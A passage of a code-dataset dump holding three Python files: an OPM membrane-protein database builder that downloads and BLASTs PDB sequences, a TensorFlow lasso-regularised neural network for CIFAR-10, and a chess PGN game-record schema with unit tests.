is an orphaned subunit\n\t\t\tif pdbid in parent_proteins: continue\n\t\t\telse: proteins[pdbid] = pdbtm_dbtool.PDB()\n\t\tchain = pdbtm_dbtool.Chain(label=letter, parent=proteins[pdbid])\n\n\t\tproteins[pdbid].chains.append(chain)\n\t\tsegments = subunit['segment']\n\t\tspans = re.split(r'\\),?\\s*[0-9][0-9]?\\s*\\(?', segments)\n\t\tsegstr = ''\n\t\ttrouble = '2he6'\n\t\tfor i in spans:\n\t\t\ts = i\n\t\t\tif pdbid == trouble: print('start:', s)\n\t\t\ts = re.sub(r'\\n[A-Za-z]+', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\r?\\n', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'^\\s*[0-9]+\\(\\s*', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\s+', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'[0-9]+\\(', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\)[^\\-]*', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\tif s.strip(): segstr += s + ','\n\t\t\tif pdbid == trouble: print('final:', s)\n\t\t#print(segments)\n\t\t#print(segstr[:-1])\n\t\t#print(sorted(db))\n\t\twriteme.append('{}_{}\\t{}\\n'.format(pdbid, letter, segstr[:-1]))\n\t\tif pdbid == trouble: print(writeme[-1])\n\t\tif pdbid in related_proteins:\n\t\t\tfor relpdbid in related_proteins[pdbid]:\n\t\t\t\twriteme.append('{}_{}\\t{}\\n'.format(relpdbid, letter, segstr[:-1]))\n\n\tlast100 = []\n\twith open('{}/ASSIGNMENTS.TSV'.format(prefix), 'w') as f:\n\t\tfor s in sorted(writeme):\n\t\t\tif not last100: pass\n\t\t\telif hash(s) in last100: continue\n\n\t\t\tf.write(s)\n\t\t\tlast100.append(hash(s))\n\t\t\tif len(last100) > 100: last100.pop(0)\n\ndef correct_spans(segments, pdbid=None):\n\t''' Corrected some of the easier formatting issues. TODO: handle re-entrants properly '''\n\n\tspans = re.split(r'\\),?\\s*[0-9][0-9]?\\s*\\(?', segments)\n\tsegstr = ''\n\ttrouble = '2he6'\n\tfor i in spans:\n\t\ts = i\n\t\tif pdbid == trouble: print('start:', s)\n\t\ts = re.sub(r'\\n[A-Za-z]+', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\r?\\n', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'^\\s*[0-9]+\\(\\s*', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\s+', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'[0-9]+\\(', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\)[^\\-]*', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\tif s.strip(): segstr += s + ','\n\t\tif pdbid == trouble: print('final:', s)\n\treturn segstr[:-1]\n\n\twriteme.append('{}_{}\\t{}\\n'.format(pdbid, letter, segstr[:-1]))\n\ndef process_opm_csv(outdir):\n\t''' Parsed OPM CSVs '''\n\tif not os.path.isdir(outdir): os.mkdir(outdir)\n\n\ttry: urlopen = urllib.urlopen\n\texcept AttributeError: urlopen = urllib.request.urlopen\n\n\tif 0:\n\t\tinf = urlopen('https://lomize-group-opm.herokuapp.com/structure_subunits?fileFormat=csv')\n\t\twith open('{}/opm_subunits.csv'.format(outdir), 'w') as outf:\n\t\t\toutf.write(inf.read())\n\t\tinf.close()\n\n\tspans = {}\n\twith open('{}/opm_subunits.csv'.format(outdir)) as f:\n\t\tcsv_reader = csv.reader(f)\n\t\tfor row in csv_reader:\n\t\t\tpdbid = re.findall('[0-9a-zA-Z]+', row[5])[0].lower()\n\t\t\tchain = row[6]\n\t\t\tsegments = row[11]\n\t\t\tprint(correct_spans(segments, pdbid=pdbid))\n\t\n\ndef process_opm_scroll_primaries(outdir, force=False):\n\t''' Processed primary structure records from OPM, linking secondary representations to their primaries \n\n\tTODO: Put everything in a class and break up the easily decoupled steps into separate methods\n\t'''\n\tif not 
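With correct_spans above in scope, the chain of re.split/re.sub passes strips segment numbering, parentheses, and stray whitespace from OPM's free-text span annotations. A made-up input in the 'N( start- end)' shape the regexes target:

print(correct_spans('1( 12- 30), 2( 41- 60)'))  # -> '12-30,41-60'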
os.path.isdir(outdir): os.mkdir(outdir)\n\n\ttry: urlopen = urllib.urlopen\n\texcept AttributeError: urlopen = urllib.request.urlopen\n\n\tif force or not os.path.isfile('{}/primary_structures.json'.format(outdir)):\n\t\tprimary_structures = _scroll_json('https://lomize-group-opm.herokuapp.com/primary_structures')\n\t\twith open('{}/primary_structures.json'.format(outdir), 'w') as f:\n\t\t\tf.write(primary_structures)\n\telse: print('primary_structures.json already exists, skipping download')\n\n\tidlist = []\n\twith open('{}/primary_structures.json'.format(outdir)) as f:\n\t\tstruclist = json.loads(f.read())\n\t\tfor struc in struclist: idlist.append(struc['id'])\n\t\n\tprimary_structures = {}\n\tif force or not os.path.isfile('{}/indiv_structures.tsv'.format(outdir)):\n\t\twith open('{}/indiv_structures.tsv'.format(outdir), 'w') as f:\n\t\t\tfor n, opmid in enumerate(idlist):\n\t\t\t\turl = urlopen('https://lomize-group-opm.herokuapp.com/primary_structures/{}'.format(opmid))\n\t\t\t\t#print(json.loads(url.read()))\n\t\t\t\traw = url.read()\n\t\t\t\tobj = json.loads(raw)\n\t\t\t\tprimary_structures[obj['pdbid']] = obj\n\t\t\t\tf.write('{}\\t{}\\n'.format(obj['pdbid'], raw))\n\n\t\t\t\tif not (n % 100): \n\t\t\t\t\tf.flush()\n\t\t\t\t\tprint('Committed {}/{} individual structure records to disk'.format(n, len(idlist)))\n\telse: print('indiv_structures.json already exists, skipping download')\n\n\tsecondary_representations = {}\n\twith open('{}/indiv_structures.tsv'.format(outdir)) as f:\n\t\tfor l in f:\n\t\t\tif not l.strip(): continue\n\t\t\telif l.lstrip().startswith('#'): continue\n\n\t\t\tpdbid, raw = l.split('\\t')\n\t\t\tobj = json.loads(raw)\n\t\t\tprimary_structures[pdbid] = obj\n\t\t\tif obj['secondary_representations']:\n\t\t\t\tsecondary_representations[pdbid] = obj['secondary_representations']\n\n\tfor primaryid in secondary_representations:\n\t\tfor secondaryobj in secondary_representations[primaryid]:\n\t\t\tsecondaryid = secondaryobj['pdbid']\n\t\t\tif secondaryid in primary_structures: continue\n\n\t\t\telse: \n\t\t\t\tprimary_structures[secondaryid] = primary_structures[primaryid].copy()\n\t\t\t\tprimary_structures[secondaryid]['pdbid'] = secondaryid\n\t\t\t\t#print(primary_structures[primaryid]['pdbid'], primary_structures[secondaryid]['pdbid'])\n\n\tif force or not os.path.isfile('{}/ASSIGNMENTS.TSV'.format(outdir)):\n\t\twith open('{}/ASSIGNMENTS.TSV'.format(outdir), 'w') as f:\n\t\t\tfor pdbid in sorted(primary_structures):\n\t\t\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\t\t\tchain = subunit['protein_letter']\n\t\t\t\t\tsegment = subunit['segment']\n\n\t\t\t\t\tspans = correct_spans(segment, pdbid=pdbid)\n\t\t\t\t\tf.write('{}_{}\\t{}\\n'.format(pdbid.lower(), chain, spans))\n\telse: print('ASSIGNMENTS.TSV already exists, skipping rebuild')\n\n\tprint('Mapping secondaries back to primaries')\n\tsec2prim = {}\n\tfor primaryid in secondary_representations:\n\t\tfor secobj in secondary_representations[primaryid]:\n\t\t\tsec2prim[secobj['pdbid']] = primaryid\n\n\n\tif force or not os.path.isfile('{}/all_pdbs.tar.gz'.format(outdir)):\n\t\tsubprocess.call(['wget', '-O', '{}/all_pdbs.tar.gz'.format(outdir), 'https://storage.googleapis.com/opm-assets/pdb/tar_files/all_pdbs.tar.gz'])\n\telse: print('Found all_pdbs.tar.gz, skipping redownload')\n\n\tif force or not os.path.isdir('{}/pdb'.format(outdir)): \n\t\tif not os.path.isdir('{}/pdb'.format(outdir)): os.mkdir('{}/pdb'.format(outdir))\n\n\t\tsubprocess.call(['tar', 'xzf', 
'{}/all_pdbs.tar.gz'.format(outdir), '-C', outdir])\n\t\t#f_remote = urlopen('https://storage.googleapis.com/opm-assets/pdb/tar_files/all_pdbs.tar.gz', 'rb')\n\t\t#with open('{}/all_pdbs.tar.gz'.format(outdir), 'wb') as f_local:\n\t\t#\tf_local.write(f_remote.read())\n\telse: print('Found pdb subdirectory, skipping reextraction')\n\n\n\tif not os.path.isdir('{}/sequences'.format(outdir)): os.mkdir('{}/sequences'.format(outdir))\n\n\n\tsequences = {}\n\tif not os.path.isdir('{}/sequences'.format(outdir)): os.mkdir('{}/sequences'.format(outdir))\n\n\tprint('Counting relevant PDB subunits')\n\trelevant_pdbc = set()\n\tfor pdbid in sorted(primary_structures):\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\t\t\trelevant_pdbc.add(pdbc)\n\n\tprint('Extracting {} sequences. This may take some time'.format(len(primary_structures)))\n\tfor n, pdbid in enumerate(sorted(primary_structures)):\n\t\tif not n % 500: print('Extracted {} sequences so far'.format(n))\n\t\tfn = '{}/pdb/{}.pdb'.format(outdir, pdbid.lower())\n\t\tif not os.path.isfile(fn):\n\t\t\tif pdbid in sec2prim: fn = '{}/pdb/{}.pdb'.format(outdir, sec2prim[pdbid].lower())\n\t\t\telse: \n\t\t\t\tsubprocess.call(['wget', '-O', fn + '.gz', 'https://files.rcsb.org/download/{}.pdb.gz'.format(pdbid)])\n\t\t\t\tsubprocess.call(['gunzip', fn + '.gz'])\n\n\t\tdone_seq = True\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\n\t\t\tif force or not os.path.isfile('{}/sequences/{}_{}.fa'.format(outdir, pdbid, chain)):\n\t\t\t\tdone_seq = False\n\t\t\t\tbreak\n\t\tif done_seq: continue\n\n\t\tif os.path.isfile(fn):\n\t\t\twith open(fn) as f:\n\t\t\t\tpdbseq = extract_pdb_sequences(f)\n\t\t\tfor chain in pdbseq:\n\t\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\t\t\t\tif pdbc not in relevant_pdbc: continue\n\n\t\t\t\toutfn = '{}/sequences/{}_{}.fa'.format(outdir, pdbid.upper(), chain)\n\t\t\t\tif force or not os.path.isfile(outfn):\n\t\t\t\t\twith open(outfn, 'w') as f:\n\t\t\t\t\t\tf.write('>{}_{}\\n{}'.format(pdbid.upper(), chain, pdbseq[chain]))\n\n\n\ttcdb2pdb = {}\n\n\tprint('Evaluating sequence quality')\n\tskipme = set()\n\tif os.path.isfile('{}/bad_seqlist'.format(outdir)): \n\t\twith open('{}/bad_seqlist'.format(outdir)) as f:\n\t\t\tfor l in f:\n\t\t\t\tif not l.strip(): continue\n\t\t\t\telif l.lstrip().startswith('#'): continue\n\t\t\t\tskipme.add(l.strip())\n\n\tskipf = open('{}/bad_seqlist'.format(outdir), 'w')\n\tprint('BLASTing sequences for {} structures against TCDB. 
This could take a while.'.format(len(primary_structures)))\n\tfor n, pdbid in enumerate(sorted(primary_structures)):\n\t\tif not n % 500: print('BLASTed sequences for {} structures so far'.format(n))\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\n\t\t\tfn = '{}/sequences/{}.fa'.format(outdir, pdbc)\n\n\t\t\tif skipme and (pdbc in skipme): continue\n\t\t\telse:\n\t\t\t\tif os.path.isfile(fn):\n\t\t\t\t\twith open(fn) as f:\n\t\t\t\t\t\tif is_low_quality_sequence(f.read()): \n\t\t\t\t\t\t\tskipf.write(pdbc + '\\n')\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\ttcid = quickblast(fn, expect=1e-5, ident=0.95)\n\t\t\t\t\tif tcid: \n\t\t\t\t\t\ttry: tcdb2pdb[tcid].append(pdbc)\n\t\t\t\t\t\texcept KeyError: tcdb2pdb[tcid] = [pdbc]\n\n\tif force or not os.path.isfile('{}/tcmap.tsv'.format(outdir)):\n\t\twith open('{}/tcmap.tsv'.format(outdir), 'w') as f:\n\t\t\tline = ''\n\t\t\tfor tcid in sorted(tcdb2pdb):\n\t\t\t\tline += tcid + '\\t'\n\t\t\t\tfor pdb in sorted(tcdb2pdb[tcid]):\n\t\t\t\t\tline += pdb + ','\n\t\t\tf.write(line[:-1] + '\\n')\n\telse: print('OPM-specific tcmap found, skipping remapping')\n\t\t\t\t\ndef extract_pdb_sequences(f):\n\t''' Grabs sequences from the ATOM records in a PDB file '''\n\tsequences = {}\n\tfor l in f:\n\t\tif not l.strip(): continue\n\t\telif not l.startswith('ATOM'): continue\n\t\tif l[13:15] != 'CA': continue\n\t\ttry: resn = CODE[l[17:20]]\n\t\texcept KeyError: continue\n\t\t#resi = l[22:26]\n\t\tchain = l[21]\n\t\tif not chain.strip(): chain = 'A'\n\n\t\ttry: sequences[chain] += resn\n\t\texcept KeyError: sequences[chain] = resn\n\treturn sequences\n\t\t\ndef is_low_quality_sequence(fasta):\n\t''' Heuristic for a sequence being too incomplete to even BLAST '''\n\tseq = re.sub('[^A-Za-z*]', '', fasta[fasta.find('\\n'):])\n\tif seq.count('X') > (len(seq)*.75): return True\n\telif len(seq) < 20: return True\n\treturn False\n\n\ndef quickblast(fn, expect=1e-5, ident=0.95):\n\t''' BLAST a sequence against TCDB. Requires that the TCDB BLAST database be somewhere in $BLASTDB '''\n\tout = subprocess.check_output(['blastp', '-db', 'tcdb', '-outfmt', '6', '-evalue', str(expect), '-max_target_seqs', '1', '-query', fn])\n\tif not out.strip(): return None\n\n\trow = out.split('\\t')\n\te = float(row[10])\n\ti = float(row[2]) / 100  # outfmt 6 reports percent identity; convert to a fraction\n\tacc = row[1]\n\n\n\tif i >= ident: return acc\n\telif e <= expect: return acc\n\telse: return None\n\n\ndef fetch_seq(pdbc):\n\t''' Grabs a sequence from PDBAA '''\n\tp = subprocess.Popen(['blastdbcmd', '-db', 'pdbaa', '-entry', pdbc, '-target_only'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n\n\treturn out\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description='Manages OPM databases. Automatically fetches the OPM database if no options are specified. Run without any arguments, opm_dbtool will retrieve the OPM database, store it in opm, and unpack it.')\n\n\tparser.add_argument('directory', nargs='?', default='opm', help='directory to store database in')\n\tparser.add_argument('-f', '--force-refresh', action='store_true', help='force overwrite of existing database. 
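extract_pdb_sequences above keys on CA atoms (columns 13-15 of each ATOM record), translates the three-letter residue name in columns 17-20 through Biopython's lookup table, and buckets residues by the chain id in column 21. Fed hand-written ATOM lines (dummy coordinates; only the columns the parser reads matter), it yields one sequence per chain -- assuming the function above and Biopython's CODE table are in scope:

pdb_lines = [
    'ATOM      1  N   ALA A   1       0.000   0.000   0.000',
    'ATOM      2  CA  ALA A   1       1.000   0.000   0.000',
    'ATOM      3  CA  GLY A   2       2.000   0.000   0.000',
    'ATOM      4  CA  SER B   1       3.000   0.000   0.000',
]
print(extract_pdb_sequences(pdb_lines))  # {'A': 'AG', 'B': 'S'}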
Functionally equivalent to removing the old database and rerunning.')\n\n\targs = parser.parse_args()\n\n\tprocess_opm_scroll_primaries(outdir=args.directory, force=args.force_refresh)\n","sub_path":"opm_dbtool.py","file_name":"opm_dbtool.py","file_ext":"py","file_size_in_byte":15867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"11018256","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 27 01:35:03 2017\n\n@author: wuzhenglin\n\"\"\"\n#==============================================================================\n# optimize the \"DNN pro\" \n# with softmax and lasso\n#\n# Dataset is cifar-10(not download)\n#==============================================================================\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cPickle as pickle\n\n#lambda = 0.5\n\nAlpha = 0.5\n\ndef unpickle(filename):\n    with open(filename) as f:\n        data = pickle.load(f)\n    return data\n\ndef onehot(labels):\n    n_sample = len(labels)\n    n_class = max(labels) + 1\n    onehot_labels = np.zeros((n_sample, n_class))\n    onehot_labels[np.arange(n_sample), labels] = 1\n    \n    return onehot_labels\n\ndata1 = unpickle('cifar-10-batches-py/data_batch_1')\ndata2 = unpickle('cifar-10-batches-py/data_batch_2')\ndata3 = unpickle('cifar-10-batches-py/data_batch_3')\ndata4 = unpickle('cifar-10-batches-py/data_batch_4')\ndata5 = unpickle('cifar-10-batches-py/data_batch_5')\ntest = unpickle('cifar-10-batches-py/test_batch')\n\nx_train = np.concatenate((data1['data'], data2['data'], data3['data'], \n                          data4['data'], data5['data']), axis=0)\nlabel = np.concatenate((data1['labels'], data2['labels'], data3['labels'], \n                        data4['labels'], data5['labels']), axis=0)\ny_train = onehot(label)\n\nx_test = test['data']\ny_test = onehot(test['labels'])\n\nlearning_rate = 0.001\ntraining_epochs = 500\nbatch_size = 500\ndisplay_step = 1\nn_sample = x_train.shape[0]\n\nn_input = x_train.shape[1]\nn_class = y_train.shape[1]\n\nn_hidden_1 = 1024\nn_hidden_2 = 1024\nn_hidden_3 = 1024\n\nx = tf.placeholder('float', [None, n_input])\ny = tf.placeholder('float', [None, n_class])\n\n#add lasso layer\ndiag_random = np.random.normal(0, 0.1, n_input)\nMa_diag = np.diag(diag_random)\nweight_lasso = tf.Variable(Ma_diag, dtype=tf.float32)\nbias_lasso = tf.Variable(tf.random_normal([n_input]))\noutput_lasso = tf.add(tf.matmul(x, weight_lasso), bias_lasso)\nlayer_0 = tf.nn.relu(output_lasso)\n\ndef add_layer(inputs, a, b, act_Fun = None):\n    weight = tf.Variable(tf.random_normal([a, b]))\n    bias = tf.Variable(tf.random_normal([b]))\n    y = tf.add(tf.matmul(inputs, weight), bias)\n    keep = 0.5\n    y = tf.nn.dropout(y, keep)\n    \n    if act_Fun is None:\n        output = y \n    else:\n        output = act_Fun(y)\n    \n    return output\n\ndef multiplayer_perceptron(first_in):\n    \n    layer_1 = add_layer(first_in, n_input, n_hidden_1, act_Fun = tf.nn.relu)\n    \n    layer_2 = add_layer(layer_1, n_hidden_1, n_hidden_2, act_Fun = tf.nn.relu)\n    \n    layer_3 = add_layer(layer_2, n_hidden_2, n_hidden_3, act_Fun = tf.nn.relu)\n    \n    out_layer = add_layer(layer_3, n_hidden_3, n_class, act_Fun = tf.nn.softmax)\n    \n    return out_layer\n\npred = multiplayer_perceptron(layer_0)\n\nweight_lasso_sum = tf.reduce_sum(tf.abs(weight_lasso))  # L1 penalty on the lasso weights\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y) + Alpha * weight_lasso_sum)\n\noptimize = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\ninit = tf.initialize_all_variables()\ncorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 
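The onehot helper above builds an (n_samples, n_classes) indicator matrix by fancy-indexing one column per row. The same trick in isolation:

import numpy as np

labels = np.array([0, 2, 1, 2])
onehot = np.zeros((labels.size, labels.max() + 1))
onehot[np.arange(labels.size), labels] = 1   # one 1 per row, at the label's column
print(onehot)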
1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\nwith tf.Session() as sess:\n sess.run(init)\n \n for epoch in range(training_epochs):\n avg_loss = 0\n total_batch = int(n_sample / batch_size)\n for i in range(total_batch):\n _, c = sess.run([optimize, loss], \n feed_dict={x: x_train[i*batch_size : (i + 1)*batch_size, :], \n y: y_train[i*batch_size : (i + 1)*batch_size, :]})\n avg_loss += c / total_batch\n \n plt.plot(epoch + 1, avg_loss, 'co')\n \n if epoch % display_step == 0:\n print('Epoch:', '%04d' % (epoch + 1), 'cost=', '{:.9f}'.format(avg_loss))\n \n print('Opitimization Finished!')\n \n\n#Test\nacc = accuracy.eval({x: x_test, y: y_test})\nprint('Accuracy:', acc)\n\n#show on board\n\n#plt.xlabel('Epoch')\n# plt.ylabel('Loss')\n# plt.title('lr=%f, te=%d, bs=%d, acc=%f' % (learning_rate, training_epochs, batch_size, acc))\n# plt.tight_layout()\n# plt.savefig('cifar-10-batches-py / MLP-TF14-test.png', dpi=200)\n#\n# plt.show()\n","sub_path":"DNN_three layers_pro.py","file_name":"DNN_three layers_pro.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"547783402","text":"import time, copy, json\nfrom .utils import parse_pgn_instructions\n\n\nclass GameSchema:\n \n '''Holds, Loads, Converts records of games'''\n\n def __init__(self):\n \n self.pgn_instructions = None #str\n self.pgn_parsed = None #parsed triplets\n \n self.pgn_check_schedule = None\n self.pgn_capture_schedule = None\n self.pgn_mate_turn = None #as an i_turn\n self.pgn_player_last_move = None #\"who didnt resign\" 0=white, 1=black\n \n self.pgn_s_outcome = None #str from pgn file\n self.pgn_outcome_code = None\n \n self.doublet_instructions = None\n\n def to_json(self,**kwargs):\n \n data = {}\n\n data['pgn_instructions'] = self.pgn_instructions\n\n data['pgn_check_schedule'] = self.pgn_check_schedule\n data['pgn_capture_schedule'] = self.pgn_capture_schedule\n data['pgn_mate_turn'] = self.pgn_mate_turn\n data['pgn_player_last_move'] = self.pgn_player_last_move\n\n data['pgn_s_outcome'] = self.pgn_s_outcome\n \n return json.dumps(data)\n \n def from_json(self,json_data):\n \n k = 'pgn_instructions'\n if k in json_data:\n self.pgn_instructions = json_data[k]\n\n k = 'pgn_check_schedule'\n if k in json_data:\n self.pgn_check_schedule = json_data[k]\n\n k = 'pgn_capture_schedule'\n if k in json_data:\n self.pgn_capture_schedule = json_data[k]\n\n k = 'pgn_mate_turn'\n if k in json_data:\n self.pgn_mate_turn = json_data[k]\n\n k = 'pgn_player_last_move'\n if k in json_data:\n self.pgn_player_last_move = json_data[k]\n\n k = 'pgn_s_outcome'\n if k in json_data:\n self.pgn_s_outcome = json_data[k]\n \n \n def set_pgn_instructions(self, s_instructions):\n self.pgn_instructions = s_instructions\n\n def set_pgn_s_outcome(self, s_outcome):\n self.pgn_s_outcome = s_outcome\n\n def get_instructions(self):\n return str(self.pgn_instructions) #convert from unicode\n\n def get_pgn_parsed(self):\n return copy.copy(self.pgn_parsed)\n\n def get_check_schedule(self):\n return copy.copy(self.pgn_check_schedule)\n \n def get_capture_schedule(self):\n return copy.copy(self.pgn_capture_schedule)\n\n def get_mate_turn(self):\n return self.pgn_mate_turn\n\n def get_s_outcome(self):\n return self.pgn_s_outcome\n\n def get_player_last_move(self):\n return self.pgn_player_last_move\n\n \n def parse_pgn_instructions(self\n ,b_check_schedule=False\n ,b_capture_schedule=False\n ,b_mate_turn=False\n ,b_player_last_move=False\n ):\n\n 
#The main parsing: pgn triplets\n self.pgn_parsed = parse_pgn_instructions(self.pgn_instructions)\n \n #Secondary parsings\n if b_check_schedule:\n self.pgn_check_schedule = parse_pgn_instructions(\n self.pgn_instructions\n ,b_check_schedule=True\n )\n\n if b_capture_schedule:\n self.pgn_capture_schedule = parse_pgn_instructions(\n self.pgn_instructions\n ,b_capture_schedule=True\n )\n\n if b_mate_turn:\n self.pgn_mate_turn = parse_pgn_instructions(\n self.pgn_instructions\n ,b_mate_turn=True\n )\n if b_player_last_move:\n self.pgn_player_last_move = int(not(len(self.pgn_parsed) % 2))\n \n \n def all_parse_pgn_instructions(self):\n \n self.parse_pgn_instructions(b_check_schedule=True\n ,b_capture_schedule=True\n ,b_mate_turn=True\n ,b_player_last_move=True\n )\n\n @staticmethod\n def iturn_to_pgnturn(i_turn):\n ''' returns: (pgn_turn (int), player (int [0 or 1]) \n player: 0=white,1=black\n '''\n player_int = int(not(i_turn % 2))\n pgn_turn = ((i_turn - 1) // 2) + 1\n return (pgn_turn, player_int)\n\n @staticmethod\n def pgnturn_to_iturn(pgn_turn, player_int):\n ''' returns: i_turn (int)\n input: pgn_turn (int), player_int (int) 0=white,1=black\n '''\n return (pgn_turn * 2) - int(not(bool(player_int)))\n \n\n #TODO - create pgn from game record\n\n def parse_full_pgn_markdown(self,**kwargs):\n pass\n\n def make_doublet_from_pgn(self):\n pass\n\n\ndef test_schema_turn_convert():\n \n gs = GameSchema()\n \n assert gs.pgnturn_to_iturn(4,1) == 8 \n assert gs.pgnturn_to_iturn(4,0) == 7\n assert gs.pgnturn_to_iturn(1,0) == 1\n\n assert gs.iturn_to_pgnturn(1) == (1,0)\n assert gs.iturn_to_pgnturn(2) == (1,1)\n assert gs.iturn_to_pgnturn(17) == (9,0)\n assert gs.iturn_to_pgnturn(16) == (8,1)\n \ndef test_schema_check_schedule():\n \n gs = GameSchema()\n \n s_pgn = '1. c4 Nf6 2. Nc3 g6'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n assert gs.get_check_schedule() == [False, False, False, False]\n\n s_pgn = '1. Nf3 e6 2. c4 b6 3. g3 Bb7 4. Bg2 c5 5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4 Nc6 9. Qf4 O-O 10. Rd1 Qb8 11. e4 d6 12. b3 a6 13. Bb2 Rd8 14. Qe3 Qa7 15. Ba3 Bf8 16. h3 b5 17. Qxa7 Nxa7 18. e5 dxe5 19. Bxf8 Kxf8 20. Nxe5 Bxg2 21. Kxg2 bxc4 22. bxc4 Ke8 23. Rab1 Rxd1 24. Nxd1 Ne4 25. Rb7 Nd6 26. Rc7 Nac8 27. c5 Ne4 28. Rxf7 Ra7 29. Rf4 Nf6 30. Ne3 Rc7 31. Rc4 Ne7 32. f4 Nc6 33. N3g4 Nd5 34. Nxc6 Rxc6 35. Kf3 Rc7 36. Ne5 Kd8 37. c6 Ke7 38. Ra4 Ra7 39. Kf2 Kd6 40. h4 a5 41. Kf3 Nc3 42. Rd4+ Nd5 43. Ke4 g6 44. g4 Kc7 45. Rd2 a4 46. f5 Nf6+ 47. Kf4 exf5 48. gxf5 Ra5 49. fxg6 hxg6 50. Rb2 Nd5+ 51. Ke4 Nb6 52. Rf2 a3 53. Rf7+ Kc8 54. Nxg6 Ra4+ 55. Ke5 Rb4 56. Ne7+ Kd8 57. c7+ Ke8 58. Rh7 Rc4 59. Nd5 Rc5 60. Rh8+ Kd7 61. Rd8+'\n gs.set_pgn_instructions(s_pgn)\n gs.parse_pgn_instructions(b_check_schedule=True)\n\n base = [False] * (60*2 + 1)\n base[83 - 1] = True\n base[92 - 1] = True\n base[100 - 1] = True\n base[105 - 1] = True\n base[108 - 1] = True\n base[111 - 1] = True\n base[113 - 1] = True\n base[119 - 1] = True\n base[121 - 1] = True\n\n assert gs.get_check_schedule() == base\n\ndef test_schema_capture_schedule():\n \n gs = GameSchema()\n\n s_pgn = '5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n\n assert gs.get_capture_schedule() == [False, False, False, False, False, True, True]\n\ndef test_schema_mate_turn():\n pass\n\ndef test_schema_player_last_move():\n \n gs = GameSchema()\n\n s_pgn = '1. Nf3 e6 2. c4 b6 3. g3 Bb7 4. Bg2 c5 5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4 Nc6 9. Qf4 O-O 10. Rd1 Qb8 11. e4 d6 12. 
b3 a6 13. Bb2 Rd8 14. Qe3 Qa7 15. Ba3 Bf8 16. h3 b5 17. Qxa7 Nxa7 18. e5 dxe5 19. Bxf8 Kxf8 20. Nxe5 Bxg2 21. Kxg2 bxc4 22. bxc4 Ke8 23. Rab1 Rxd1 24. Nxd1 Ne4 25. Rb7 Nd6 26. Rc7 Nac8 27. c5 Ne4 28. Rxf7 Ra7 29. Rf4 Nf6 30. Ne3 Rc7 31. Rc4 Ne7 32. f4 Nc6 33. N3g4 Nd5 34. Nxc6 Rxc6 35. Kf3 Rc7 36. Ne5 Kd8 37. c6 Ke7 38. Ra4 Ra7 39. Kf2 Kd6 40. h4 a5 41. Kf3 Nc3 42. Rd4+ Nd5 43. Ke4 g6 44. g4 Kc7 45. Rd2 a4 46. f5 Nf6+ 47. Kf4 exf5 48. gxf5 Ra5 49. fxg6 hxg6 50. Rb2 Nd5+ 51. Ke4 Nb6 52. Rf2 a3 53. Rf7+ Kc8 54. Nxg6 Ra4+ 55. Ke5 Rb4 56. Ne7+ Kd8 57. c7+ Ke8 58. Rh7 Rc4 59. Nd5 Rc5 60. Rh8+ Kd7 61. Rd8+'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n\n assert gs.get_player_last_move() == 0\n\n\nclass GameLog:\n\n ''' Holds all data collected within the game.\n Used as data-structure when returned from a test. '''\n\n def __init__(self,**kwargs):\n \n #TODO - remove these\n self.board_pre_turn = True\n self.board_pre_turn_oppoenent = kwargs.get('b_log_show_opponent', False)\n self.manual_control = kwargs.get('manual_control', ())\n \n \n # Used to turn on all logs at once\n self.b_full_log = kwargs.get('b_full_log', False)\n _all = self.b_full_log \n \n self.b_check_schedule = kwargs.get('b_check_schedule', False) or _all\n self.log_check_schedule = []\n \n self.b_log_move = kwargs.get('b_log_move', False) or _all\n self.log_move = []\n \n self.b_num_available = kwargs.get('b_num_available',False) or _all\n self.log_num_available = []\n\n self.b_num_pieces = kwargs.get('b_num_pieces', False) or _all\n self.log_num_pieces = []\n\n self.b_num_player_pieces = kwargs.get('b_num_player_pieces', False) or _all\n self.log_num_player_pieces = []\n\n self.b_num_pieces = kwargs.get('b_num_player_pieces', False) or _all\n 